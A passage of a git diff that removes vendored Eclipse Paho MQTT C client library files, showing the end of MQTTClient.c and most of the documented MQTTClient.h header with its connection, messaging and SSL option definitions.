-		elapsed = MQTTClient_elapsed(start);
-	}
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_getPendingDeliveryTokens(MQTTClient handle, MQTTClient_deliveryToken **tokens)
-{
-	int rc = MQTTCLIENT_SUCCESS;
-	MQTTClients* m = handle;
-	*tokens = NULL;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-
-	if (m->c && m->c->outboundMsgs->count > 0)
-	{
-		ListElement* current = NULL;
-		int count = 0;
-
-		*tokens = malloc(sizeof(MQTTClient_deliveryToken) * (m->c->outboundMsgs->count + 1));
-		/*Heap_unlink(__FILE__, __LINE__, *tokens);*/
-		while (ListNextElement(m->c->outboundMsgs, &current))
-		{
-			Messages* m = (Messages*)(current->content);
-			(*tokens)[count++] = m->msgid;
-		}
-		(*tokens)[count] = -1;
-	}
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-MQTTClient_nameValue* MQTTClient_getVersionInfo(void)
-{
-	#define MAX_INFO_STRINGS 8
-	static MQTTClient_nameValue libinfo[MAX_INFO_STRINGS + 1];
-	int i = 0;
-
-	libinfo[i].name = "Product name";
-	libinfo[i++].value = "Paho Synchronous MQTT C Client Library";
-
-	libinfo[i].name = "Version";
-	libinfo[i++].value = CLIENT_VERSION;
-
-	libinfo[i].name = "Build level";
-	libinfo[i++].value = BUILD_TIMESTAMP;
-#if defined(OPENSSL)
-	libinfo[i].name = "OpenSSL version";
-	libinfo[i++].value = SSLeay_version(SSLEAY_VERSION);
-
-	libinfo[i].name = "OpenSSL flags";
-	libinfo[i++].value = SSLeay_version(SSLEAY_CFLAGS);
-
-	libinfo[i].name = "OpenSSL build timestamp";
-	libinfo[i++].value = SSLeay_version(SSLEAY_BUILT_ON);
-
-	libinfo[i].name = "OpenSSL platform";
-	libinfo[i++].value = SSLeay_version(SSLEAY_PLATFORM);
-
-	libinfo[i].name = "OpenSSL directory";
-	libinfo[i++].value = SSLeay_version(SSLEAY_DIR);
-#endif
-	libinfo[i].name = NULL;
-	libinfo[i].value = NULL;
-	return libinfo;
-}
-
-
-/**
- * See if any pending writes have been completed, and cleanup if so.
- * Cleaning up means removing any publication data that was stored because the write did
- * not originally complete.
- */
-static void MQTTProtocol_checkPendingWrites(void)
-{
-	FUNC_ENTRY;
-	if (state.pending_writes.count > 0)
-	{
-		ListElement* le = state.pending_writes.first;
-		while (le)
-		{
-			if (Socket_noPendingWrites(((pending_write*)(le->content))->socket))
-			{
-				MQTTProtocol_removePublication(((pending_write*)(le->content))->p);
-				state.pending_writes.current = le;
-				ListRemove(&(state.pending_writes), le->content); /* does NextElement itself */
-				le = state.pending_writes.current;
-			}
-			else
-				ListNextElement(&(state.pending_writes), &le);
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-static void MQTTClient_writeComplete(int socket)
-{
-	ListElement* found = NULL;
-
-	FUNC_ENTRY;
-	/* a partial write is now complete for a socket - this will be on a publish*/
-
-	MQTTProtocol_checkPendingWrites();
-
-	/* find the client using this socket */
-	if ((found = ListFindItem(handles, &socket, clientSockCompare)) != NULL)
-	{
-		MQTTClients* m = (MQTTClients*)(found->content);
-
-		time(&(m->c->net.lastSent));
-	}
-	FUNC_EXIT;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTClient.h b/thirdparty/paho.mqtt.c/src/MQTTClient.h
deleted file mode 100644
index 9aee563..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTClient.h
+++ /dev/null
@@ -1,1396 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - multiple server connection support
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - remove const from eyecatchers #168
- *******************************************************************************/
-
-/**
- * @cond MQTTClient_internal
- * @mainpage MQTT Client Library Internals
- * In the beginning there was one MQTT C client library, MQTTClient, as implemented in MQTTClient.c
- * This library was designed to be easy to use for applications which didn't mind if some of the calls
- * blocked for a while.  For instance, the MQTTClient_connect call will block until a successful
- * connection has completed, or a connection has failed, which could be as long as the "connection
- * timeout" interval, whose default is 30 seconds.
- *
- * However in mobile devices and other windowing environments, blocking on the GUI thread is a bad
- * thing as it causes the user interface to freeze.  Hence a new API, MQTTAsync, implemented
- * in MQTTAsync.c, was devised.  There are no blocking calls in this library, so it is well suited
- * to GUI and mobile environments, at the expense of some extra complexity.
- *
- * Both libraries are designed to be sparing in the use of threads.  So multiple client objects are
- * handled by one or two threads, with a select call in Socket_getReadySocket(), used to determine
- * when a socket has incoming data.  This API is thread safe: functions may be called by multiple application
- * threads, with the exception of ::MQTTClient_yield and ::MQTTClient_receive, which are intended
- * for single threaded environments only.
- *
- * @endcond
- * @cond MQTTClient_main
- * @mainpage MQTT Client library for C
- * &copy; Copyright IBM Corp. 2009, 2017
- *
- * @brief An MQTT client library in C.
- *
- * These pages describe the original more synchronous API which might be
- * considered easier to use.  Some of the calls will block.  For the new
- * totally asynchronous API where no calls block, which is especially suitable
- * for use in windowed environments, see the
- * <a href="../../MQTTAsync/html/index.html">MQTT C Client Asynchronous API Documentation</a>.
- * The MQTTClient API is not thread safe, whereas the MQTTAsync API is.
- *
- * An MQTT client application connects to MQTT-capable servers.
- * A typical client is responsible for collecting information from a telemetry
- * device and publishing the information to the server. It can also subscribe
- * to topics, receive messages, and use this information to control the
- * telemetry device.
- *
- * MQTT clients implement the published MQTT v3 protocol. You can write your own
- * API to the MQTT protocol using the programming language and platform of your
- * choice. This can be time-consuming and error-prone.
- *
- * To simplify writing MQTT client applications, this library encapsulates
- * the MQTT v3 protocol for you. Using this library enables a fully functional
- * MQTT client application to be written in a few lines of code.
- * The information presented here documents the API provided
- * by the MQTT Client library for C.
- *
- * <b>Using the client</b><br>
- * Applications that use the client library typically use a similar structure:
- * <ul>
- * <li>Create a client object</li>
- * <li>Set the options to connect to an MQTT server</li>
- * <li>Set up callback functions if multi-threaded (asynchronous mode)
- * operation is being used (see @ref async).</li>
- * <li>Subscribe to any topics the client needs to receive</li>
- * <li>Repeat until finished:</li>
- *     <ul>
- *     <li>Publish any messages the client needs to</li>
- *     <li>Handle any incoming messages</li>
- *     </ul>
- * <li>Disconnect the client</li>
- * <li>Free any memory being used by the client</li>
- * </ul>
- * Some simple examples are shown here:
- * <ul>
- * <li>@ref pubsync</li>
- * <li>@ref pubasync</li>
- * <li>@ref subasync</li>
- * </ul>
- * Additional information about important concepts is provided here:
- * <ul>
- * <li>@ref async</li>
- * <li>@ref wildcard</li>
- * <li>@ref qos</li>
- * <li>@ref tracing</li>
- * </ul>
- * @endcond
- */
-
-/*
-/// @cond EXCLUDE
-*/
-#if defined(__cplusplus)
- extern "C" {
-#endif
-#if !defined(MQTTCLIENT_H)
-#define MQTTCLIENT_H
-
-#if defined(WIN32) || defined(WIN64)
-  #define DLLImport __declspec(dllimport)
-  #define DLLExport __declspec(dllexport)
-#else
-  #define DLLImport extern
-  #define DLLExport __attribute__ ((visibility ("default")))
-#endif
-
-#include <stdio.h>
-/*
-/// @endcond
-*/
-
-#if !defined(NO_PERSISTENCE)
-#include "MQTTClientPersistence.h"
-#endif
-
-/**
- * Return code: No error. Indicates successful completion of an MQTT client
- * operation.
- */
-#define MQTTCLIENT_SUCCESS 0
-/**
- * Return code: A generic error code indicating the failure of an MQTT client
- * operation.
- */
-#define MQTTCLIENT_FAILURE -1
-
-/* error code -2 is MQTTCLIENT_PERSISTENCE_ERROR */
-
-/**
- * Return code: The client is disconnected.
- */
-#define MQTTCLIENT_DISCONNECTED -3
-/**
- * Return code: The maximum number of messages allowed to be simultaneously
- * in-flight has been reached.
- */
-#define MQTTCLIENT_MAX_MESSAGES_INFLIGHT -4
-/**
- * Return code: An invalid UTF-8 string has been detected.
- */
-#define MQTTCLIENT_BAD_UTF8_STRING -5
-/**
- * Return code: A NULL parameter has been supplied when this is invalid.
- */
-#define MQTTCLIENT_NULL_PARAMETER -6
-/**
- * Return code: The topic has been truncated (the topic string includes
- * embedded NULL characters). String functions will not access the full topic.
- * Use the topic length value to access the full topic.
- */
-#define MQTTCLIENT_TOPICNAME_TRUNCATED -7
-/**
- * Return code: A structure parameter does not have the correct eyecatcher
- * and version number.
- */
-#define MQTTCLIENT_BAD_STRUCTURE -8
-/**
- * Return code: A QoS value that falls outside of the acceptable range (0,1,2)
- */
-#define MQTTCLIENT_BAD_QOS -9
-/**
- * Return code: Attempting SSL connection using non-SSL version of library
- */
-#define MQTTCLIENT_SSL_NOT_SUPPORTED -10
-
-/**
- * Default MQTT version to connect with.  Use 3.1.1 then fall back to 3.1
- */
-#define MQTTVERSION_DEFAULT 0
-/**
- * MQTT version to connect with: 3.1
- */
-#define MQTTVERSION_3_1 3
-/**
- * MQTT version to connect with: 3.1.1
- */
-#define MQTTVERSION_3_1_1 4
-/**
- * Bad return code from subscribe, as defined in the 3.1.1 specification
- */
-#define MQTT_BAD_SUBSCRIBE 0x80
-
-/**
- *  Initialization options
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTG. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** 1 = we do openssl init, 0 = leave it to the application */
-	int do_openssl_init;
-} MQTTClient_init_options;
-
-#define MQTTClient_init_options_initializer { {'M', 'Q', 'T', 'G'}, 0, 0 }
-
-/**
- * Global init of mqtt library. Call once on program start to set global behaviour.
- * do_openssl_init - if mqtt library should initialize OpenSSL (1) or rely on the caller to do it before using the library (0)
- */
-DLLExport void MQTTClient_global_init(MQTTClient_init_options* inits);
-
-/**
- * A handle representing an MQTT client. A valid client handle is available
- * following a successful call to MQTTClient_create().
- */
-typedef void* MQTTClient;
-/**
- * A value representing an MQTT message. A delivery token is returned to the
- * client application when a message is published. The token can then be used to
- * check that the message was successfully delivered to its destination (see
- * MQTTClient_publish(),
- * MQTTClient_publishMessage(),
- * MQTTClient_deliveryComplete(),
- * MQTTClient_waitForCompletion() and
- * MQTTClient_getPendingDeliveryTokens()).
- */
-typedef int MQTTClient_deliveryToken;
-typedef int MQTTClient_token;
-
-/**
- * A structure representing the payload and attributes of an MQTT message. The
- * message topic is not part of this structure (see MQTTClient_publishMessage(),
- * MQTTClient_publish(), MQTTClient_receive(), MQTTClient_freeMessage()
- * and MQTTClient_messageArrived()).
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTM. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** The length of the MQTT message payload in bytes. */
-	int payloadlen;
-	/** A pointer to the payload of the MQTT message. */
-	void* payload;
-	/**
-     * The quality of service (QoS) assigned to the message.
-     * There are three levels of QoS:
-     * <DL>
-     * <DT><B>QoS0</B></DT>
-     * <DD>Fire and forget - the message may not be delivered</DD>
-     * <DT><B>QoS1</B></DT>
-     * <DD>At least once - the message will be delivered, but may be
-     * delivered more than once in some circumstances.</DD>
-     * <DT><B>QoS2</B></DT>
-     * <DD>Once and one only - the message will be delivered exactly once.</DD>
-     * </DL>
-     */
-	int qos;
-	/**
-     * The retained flag serves two purposes depending on whether the message
-     * it is associated with is being published or received.
-     *
-     * <b>retained = true</b><br>
-     * For messages being published, a true setting indicates that the MQTT
-     * server should retain a copy of the message. The message will then be
-     * transmitted to new subscribers to a topic that matches the message topic.
-     * For subscribers registering a new subscription, the flag being true
-     * indicates that the received message is not a new one, but one that has
-     * been retained by the MQTT server.
-     *
-     * <b>retained = false</b> <br>
-     * For publishers, this ndicates that this message should not be retained
-     * by the MQTT server. For subscribers, a false setting indicates this is
-     * a normal message, received as a result of it being published to the
-     * server.
-     */
-	int retained;
-	/**
-      * The dup flag indicates whether or not this message is a duplicate.
-      * It is only meaningful when receiving QoS1 messages. When true, the
-      * client application should take appropriate action to deal with the
-      * duplicate message.
-      */
-	int dup;
-	/** The message identifier is normally reserved for internal use by the
-      * MQTT client and server.
-      */
-	int msgid;
-} MQTTClient_message;
-
-#define MQTTClient_message_initializer { {'M', 'Q', 'T', 'M'}, 0, 0, NULL, 0, 0, 0, 0 }
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * receipt of messages. The function is registered with the client library by
- * passing it as an argument to MQTTClient_setCallbacks(). It is
- * called by the client library when a new message that matches a client
- * subscription has been received from the server. This function is executed on
- * a separate thread to the one on which the client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTClient_setCallbacks(), which contains any application-specific context.
- * @param topicName The topic associated with the received message.
- * @param topicLen The length of the topic if there are one
- * more NULL characters embedded in <i>topicName</i>, otherwise <i>topicLen</i>
- * is 0. If <i>topicLen</i> is 0, the value returned by <i>strlen(topicName)</i>
- * can be trusted. If <i>topicLen</i> is greater than 0, the full topic name
- * can be retrieved by accessing <i>topicName</i> as a byte array of length
- * <i>topicLen</i>.
- * @param message The MQTTClient_message structure for the received message.
- * This structure contains the message payload and attributes.
- * @return This function must return a boolean value indicating whether or not
- * the message has been safely received by the client application. Returning
- * true indicates that the message has been successfully handled.
- * Returning false indicates that there was a problem. In this
- * case, the client library will reinvoke MQTTClient_messageArrived() to
- * attempt to deliver the message to the application again.
- */
-typedef int MQTTClient_messageArrived(void* context, char* topicName, int topicLen, MQTTClient_message* message);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of delivery of messages. The function is registered with the
- * client library by passing it as an argument to MQTTClient_setCallbacks().
- * It is called by the client library after the client application has
- * published a message to the server. It indicates that the necessary
- * handshaking and acknowledgements for the requested quality of service (see
- * MQTTClient_message.qos) have been completed. This function is executed on a
- * separate thread to the one on which the client application is running.
- * <b>Note:</b>MQTTClient_deliveryComplete() is not called when messages are
- * published at QoS0.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTClient_setCallbacks(), which contains any application-specific context.
- * @param dt The ::MQTTClient_deliveryToken associated with
- * the published message. Applications can check that all messages have been
- * correctly published by matching the delivery tokens returned from calls to
- * MQTTClient_publish() and MQTTClient_publishMessage() with the tokens passed
- * to this callback.
- */
-typedef void MQTTClient_deliveryComplete(void* context, MQTTClient_deliveryToken dt);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of the loss of connection to the server. The function is
- * registered with the client library by passing it as an argument to
- * MQTTClient_setCallbacks(). It is called by the client library if the client
- * loses its connection to the server. The client application must take
- * appropriate action, such as trying to reconnect or reporting the problem.
- * This function is executed on a separate thread to the one on which the
- * client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTClient_setCallbacks(), which contains any application-specific context.
- * @param cause The reason for the disconnection.
- * Currently, <i>cause</i> is always set to NULL.
- */
-typedef void MQTTClient_connectionLost(void* context, char* cause);
-
-/**
- * This function sets the callback functions for a specific client.
- * If your client application doesn't use a particular callback, set the
- * relevant parameter to NULL. Calling MQTTClient_setCallbacks() puts the
- * client into multi-threaded mode. Any necessary message acknowledgements and
- * status communications are handled in the background without any intervention
- * from the client application. See @ref async for more information.
- *
- * <b>Note:</b> The MQTT client must be disconnected when this function is
- * called.
- * @param handle A valid client handle from a successful call to
- * MQTTClient_create().
- * @param context A pointer to any application-specific context. The
- * the <i>context</i> pointer is passed to each of the callback functions to
- * provide access to the context information in the callback.
- * @param cl A pointer to an MQTTClient_connectionLost() callback
- * function. You can set this to NULL if your application doesn't handle
- * disconnections.
- * @param ma A pointer to an MQTTClient_messageArrived() callback
- * function. This callback function must be specified when you call
- * MQTTClient_setCallbacks().
- * @param dc A pointer to an MQTTClient_deliveryComplete() callback
- * function. You can set this to NULL if your application publishes
- * synchronously or if you do not want to check for successful delivery.
- * @return ::MQTTCLIENT_SUCCESS if the callbacks were correctly set,
- * ::MQTTCLIENT_FAILURE if an error occurred.
- */
-DLLExport int MQTTClient_setCallbacks(MQTTClient handle, void* context, MQTTClient_connectionLost* cl,
-									MQTTClient_messageArrived* ma, MQTTClient_deliveryComplete* dc);
-
-
-/**
- * This function creates an MQTT client ready for connection to the
- * specified server and using the specified persistent storage (see
- * MQTTClient_persistence). See also MQTTClient_destroy().
- * @param handle A pointer to an ::MQTTClient handle. The handle is
- * populated with a valid client reference following a successful return from
- * this function.
- * @param serverURI A null-terminated string specifying the server to
- * which the client will connect. It takes the form <i>protocol://host:port</i>.
- * Currently, <i>protocol</i> must be <i>tcp</i> or <i>ssl</i>.
- * For <i>host</i>, you can
- * specify either an IP address or a host name. For instance, to connect to
- * a server running on the local machines with the default MQTT port, specify
- * <i>tcp://localhost:1883</i>.
- * @param clientId The client identifier passed to the server when the
- * client connects to it. It is a null-terminated UTF-8 encoded string.
- * @param persistence_type The type of persistence to be used by the client:
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_NONE: Use in-memory persistence. If the device or
- * system on which the client is running fails or is switched off, the current
- * state of any in-flight messages is lost and some messages may not be
- * delivered even at QoS1 and QoS2.
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_DEFAULT: Use the default (file system-based)
- * persistence mechanism. Status about in-flight messages is held in persistent
- * storage and provides some protection against message loss in the case of
- * unexpected failure.
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_USER: Use an application-specific persistence
- * implementation. Using this type of persistence gives control of the
- * persistence mechanism to the application. The application has to implement
- * the MQTTClient_persistence interface.
- * @param persistence_context If the application uses
- * ::MQTTCLIENT_PERSISTENCE_NONE persistence, this argument is unused and should
- * be set to NULL. For ::MQTTCLIENT_PERSISTENCE_DEFAULT persistence, it
- * should be set to the location of the persistence directory (if set
- * to NULL, the persistence directory used is the working directory).
- * Applications that use ::MQTTCLIENT_PERSISTENCE_USER persistence set this
- * argument to point to a valid MQTTClient_persistence structure.
- * @return ::MQTTCLIENT_SUCCESS if the client is successfully created, otherwise
- * an error code is returned.
- */
-DLLExport int MQTTClient_create(MQTTClient* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context);
-
-/**
- * MQTTClient_willOptions defines the MQTT "Last Will and Testament" (LWT) settings for
- * the client. In the event that a client unexpectedly loses its connection to
- * the server, the server publishes the LWT message to the LWT topic on
- * behalf of the client. This allows other clients (subscribed to the LWT topic)
- * to be made aware that the client has disconnected. To enable the LWT
- * function for a specific client, a valid pointer to an MQTTClient_willOptions
- * structure is passed in the MQTTClient_connectOptions structure used in the
- * MQTTClient_connect() call that connects the client to the server. The pointer
- * to MQTTClient_willOptions can be set to NULL if the LWT function is not
- * required.
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTW. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 or 1
-		   0 means there is no binary payload option
-	 */
-	int struct_version;
-	/** The LWT topic to which the LWT message will be published. */
-	const char* topicName;
-	/** The LWT payload in string form. */
-	const char* message;
-	/**
-	 * The retained flag for the LWT message (see MQTTClient_message.retained).
-	 */
-	int retained;
-	/**
-	 * The quality of service setting for the LWT message (see
-	 * MQTTClient_message.qos and @ref qos).
-	 */
-	int qos;
-  /** The LWT payload in binary form. This is only checked and used if the message option is NULL */
-	struct
-	{
-  	int len;            /**< binary payload length */
-		const void* data;  /**< binary payload data */
-	} payload;
-} MQTTClient_willOptions;
-
-#define MQTTClient_willOptions_initializer { {'M', 'Q', 'T', 'W'}, 1, NULL, NULL, 0, 0, {0, NULL} }
-
-#define MQTT_SSL_VERSION_DEFAULT 0
-#define MQTT_SSL_VERSION_TLS_1_0 1
-#define MQTT_SSL_VERSION_TLS_1_1 2
-#define MQTT_SSL_VERSION_TLS_1_2 3
-
-/**
-* MQTTClient_sslProperties defines the settings to establish an SSL/TLS connection using the
-* OpenSSL library. It covers the following scenarios:
-* - Server authentication: The client needs the digital certificate of the server. It is included
-*   in a store containting trusted material (also known as "trust store").
-* - Mutual authentication: Both client and server are authenticated during the SSL handshake. In
-*   addition to the digital certificate of the server in a trust store, the client will need its own
-*   digital certificate and the private key used to sign its digital certificate stored in a "key store".
-* - Anonymous connection: Both client and server do not get authenticated and no credentials are needed
-*   to establish an SSL connection. Note that this scenario is not fully secure since it is subject to
-*   man-in-the-middle attacks.
-*/
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTS */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0, or 1 to enable TLS version selection. */
-	int struct_version;
-
-	/** The file in PEM format containing the public digital certificates trusted by the client. */
-	const char* trustStore;
-
-	/** The file in PEM format containing the public certificate chain of the client. It may also include
-	* the client's private key.
-	*/
-	const char* keyStore;
-
-	/** If not included in the sslKeyStore, this setting points to the file in PEM format containing
-	* the client's private key.
-	*/
-	const char* privateKey;
-	/** The password to load the client's privateKey if encrypted. */
-	const char* privateKeyPassword;
-
-	/**
-	* The list of cipher suites that the client will present to the server during the SSL handshake. For a
-	* full explanation of the cipher list format, please see the OpenSSL on-line documentation:
-	* http://www.openssl.org/docs/apps/ciphers.html#CIPHER_LIST_FORMAT
-	* If this setting is ommitted, its default value will be "ALL", that is, all the cipher suites -excluding
-	* those offering no encryption- will be considered.
-	* This setting can be used to set an SSL anonymous connection ("aNULL" string value, for instance).
-	*/
-	const char* enabledCipherSuites;
-
-    /** True/False option to enable verification of the server certificate **/
-    int enableServerCertAuth;
-
-    /** The SSL/TLS version to use. Specify one of MQTT_SSL_VERSION_DEFAULT (0),
-    * MQTT_SSL_VERSION_TLS_1_0 (1), MQTT_SSL_VERSION_TLS_1_1 (2) or MQTT_SSL_VERSION_TLS_1_2 (3).
-    * Only used if struct_version is >= 1.
-    */
-    int sslVersion;
-
-} MQTTClient_SSLOptions;
-
-#define MQTTClient_SSLOptions_initializer { {'M', 'Q', 'T', 'S'}, 1, NULL, NULL, NULL, NULL, NULL, 1, MQTT_SSL_VERSION_DEFAULT }
-
-/**
- * MQTTClient_connectOptions defines several settings that control the way the
- * client connects to an MQTT server.
- *
- * <b>Note:</b> Default values are not defined for members of
- * MQTTClient_connectOptions so it is good practice to specify all settings.
- * If the MQTTClient_connectOptions structure is defined as an automatic
- * variable, all members are set to random values and thus must be set by the
- * client application. If the MQTTClient_connectOptions structure is defined
- * as a static variable, initialization (in compliant compilers) sets all
- * values to 0 (NULL for pointers). A #keepAliveInterval setting of 0 prevents
- * correct operation of the client and so you <b>must</b> at least set a value
- * for #keepAliveInterval.
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTC. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0, 1, 2, 3, 4 or 5.
-	 * 0 signifies no SSL options and no serverURIs
-	 * 1 signifies no serverURIs
-	 * 2 signifies no MQTTVersion
-	 * 3 signifies no returned values
-	 * 4 signifies no binary password option
-	 */
-	int struct_version;
-	/** The "keep alive" interval, measured in seconds, defines the maximum time
-   * that should pass without communication between the client and the server
-   * The client will ensure that at least one message travels across the
-   * network within each keep alive period.  In the absence of a data-related
-	 * message during the time period, the client sends a very small MQTT
-   * "ping" message, which the server will acknowledge. The keep alive
-   * interval enables the client to detect when the server is no longer
-	 * available without having to wait for the long TCP/IP timeout.
-	 */
-	int keepAliveInterval;
-	/**
-   * This is a boolean value. The cleansession setting controls the behaviour
-   * of both the client and the server at connection and disconnection time.
-   * The client and server both maintain session state information. This
-   * information is used to ensure "at least once" and "exactly once"
-   * delivery, and "exactly once" receipt of messages. Session state also
-   * includes subscriptions created by an MQTT client. You can choose to
-   * maintain or discard state information between sessions.
-   *
-   * When cleansession is true, the state information is discarded at
-   * connect and disconnect. Setting cleansession to false keeps the state
-   * information. When you connect an MQTT client application with
-   * MQTTClient_connect(), the client identifies the connection using the
-   * client identifier and the address of the server. The server checks
-   * whether session information for this client
-   * has been saved from a previous connection to the server. If a previous
-   * session still exists, and cleansession=true, then the previous session
-   * information at the client and server is cleared. If cleansession=false,
-   * the previous session is resumed. If no previous session exists, a new
-   * session is started.
-	 */
-	int cleansession;
-	/**
-   * This is a boolean value that controls how many messages can be in-flight
-   * simultaneously. Setting <i>reliable</i> to true means that a published
-   * message must be completed (acknowledgements received) before another
-   * can be sent. Attempts to publish additional messages receive an
-   * ::MQTTCLIENT_MAX_MESSAGES_INFLIGHT return code. Setting this flag to
-	 * false allows up to 10 messages to be in-flight. This can increase
-   * overall throughput in some circumstances.
-	 */
-	int reliable;
-	/**
-   * This is a pointer to an MQTTClient_willOptions structure. If your
-   * application does not make use of the Last Will and Testament feature,
-   * set this pointer to NULL.
-   */
-	MQTTClient_willOptions* will;
-	/**
-   * MQTT servers that support the MQTT v3.1.1 protocol provide authentication
-   * and authorisation by user name and password. This is the user name
-   * parameter.
-   */
-	const char* username;
-	/**
-   * MQTT servers that support the MQTT v3.1.1 protocol provide authentication
-   * and authorisation by user name and password. This is the password
-   * parameter.
-   */
-	const char* password;
-	/**
-   * The time interval in seconds to allow a connect to complete.
-   */
-	int connectTimeout;
-	/**
-	 * The time interval in seconds
-	 */
-	int retryInterval;
-	/**
-   * This is a pointer to an MQTTClient_SSLOptions structure. If your
-   * application does not make use of SSL, set this pointer to NULL.
-   */
-	MQTTClient_SSLOptions* ssl;
-	/**
-	 * The number of entries in the optional serverURIs array. Defaults to 0.
-	 */
-	int serverURIcount;
-	/**
-   * An optional array of null-terminated strings specifying the servers to
-   * which the client will connect. Each string takes the form <i>protocol://host:port</i>.
-   * <i>protocol</i> must be <i>tcp</i> or <i>ssl</i>. For <i>host</i>, you can
-   * specify either an IP address or a host name. For instance, to connect to
-   * a server running on the local machines with the default MQTT port, specify
-   * <i>tcp://localhost:1883</i>.
-   * If this list is empty (the default), the server URI specified on MQTTClient_create()
-   * is used.
-   */
-	char* const* serverURIs;
-	/**
-	 * Sets the version of MQTT to be used on the connect.
-	 * MQTTVERSION_DEFAULT (0) = default: start with 3.1.1, and if that fails, fall back to 3.1
-	 * MQTTVERSION_3_1 (3) = only try version 3.1
-	 * MQTTVERSION_3_1_1 (4) = only try version 3.1.1
-	 */
-	int MQTTVersion;
-	/**
-	 * Returned from the connect when the MQTT version used to connect is 3.1.1
-	 */
-	struct
-	{
-		const char* serverURI;     /**< the serverURI connected to */
-		int MQTTVersion;     /**< the MQTT version used to connect with */
-		int sessionPresent;  /**< if the MQTT version is 3.1.1, the value of sessionPresent returned in the connack */
-	} returned;
-	/**
-   * Optional binary password.  Only checked and used if the password option is NULL
-   */
-  struct {
-  	int len;            /**< binary password length */
-		const void* data;  /**< binary password data */
-	} binarypwd;
-} MQTTClient_connectOptions;
-
-#define MQTTClient_connectOptions_initializer { {'M', 'Q', 'T', 'C'}, 5, 60, 1, 1, NULL, NULL, NULL, 30, 20, NULL, 0, NULL, 0,         {NULL, 0, 0}, {0, NULL} }
-
-/**
-  * MQTTClient_libraryInfo is used to store details relating to the currently used
-  * library such as the version in use, the time it was built and relevant openSSL
-  * options.
-  * There is one static instance of this struct in MQTTClient.c
-  */
-
-typedef struct
-{
-	const char* name;
-	const char* value;
-} MQTTClient_nameValue;
-
-/**
-  * This function returns version information about the library.
-  * no trace information will be returned.
-  * @return an array of strings describing the library.  The last entry is a NULL pointer.
-  */
-DLLExport MQTTClient_nameValue* MQTTClient_getVersionInfo(void);
-
-/**
-  * This function attempts to connect a previously-created client (see
-  * MQTTClient_create()) to an MQTT server using the specified options. If you
-  * want to enable asynchronous message and status notifications, you must call
-  * MQTTClient_setCallbacks() prior to MQTTClient_connect().
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param options A pointer to a valid MQTTClient_connectOptions
-  * structure.
-  * @return ::MQTTCLIENT_SUCCESS if the client successfully connects to the
-  * server. An error code is returned if the client was unable to connect to
-  * the server.
-  * Error codes greater than 0 are returned by the MQTT protocol:<br><br>
-  * <b>1</b>: Connection refused: Unacceptable protocol version<br>
-  * <b>2</b>: Connection refused: Identifier rejected<br>
-  * <b>3</b>: Connection refused: Server unavailable<br>
-  * <b>4</b>: Connection refused: Bad user name or password<br>
-  * <b>5</b>: Connection refused: Not authorized<br>
-  * <b>6-255</b>: Reserved for future use<br>
-  */
-DLLExport int MQTTClient_connect(MQTTClient handle, MQTTClient_connectOptions* options);
-
-/**
-  * This function attempts to disconnect the client from the MQTT
-  * server. In order to allow the client time to complete handling of messages
-  * that are in-flight when this function is called, a timeout period is
-  * specified. When the timeout period has expired, the client disconnects even
-  * if there are still outstanding message acknowledgements.
-  * The next time the client connects to the same server, any QoS 1 or 2
-  * messages which have not completed will be retried depending on the
-  * cleansession settings for both the previous and the new connection (see
-  * MQTTClient_connectOptions.cleansession and MQTTClient_connect()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param timeout The client delays disconnection for up to this time (in
-  * milliseconds) in order to allow in-flight message transfers to complete.
-  * @return ::MQTTCLIENT_SUCCESS if the client successfully disconnects from
-  * the server. An error code is returned if the client was unable to disconnect
-  * from the server
-  */
-DLLExport int MQTTClient_disconnect(MQTTClient handle, int timeout);
-
-/**
-  * This function allows the client application to test whether or not a
-  * client is currently connected to the MQTT server.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @return Boolean true if the client is connected, otherwise false.
-  */
-DLLExport int MQTTClient_isConnected(MQTTClient handle);
-
-
-/* Subscribe is synchronous.  QoS list parameter is changed on return to granted QoSs.
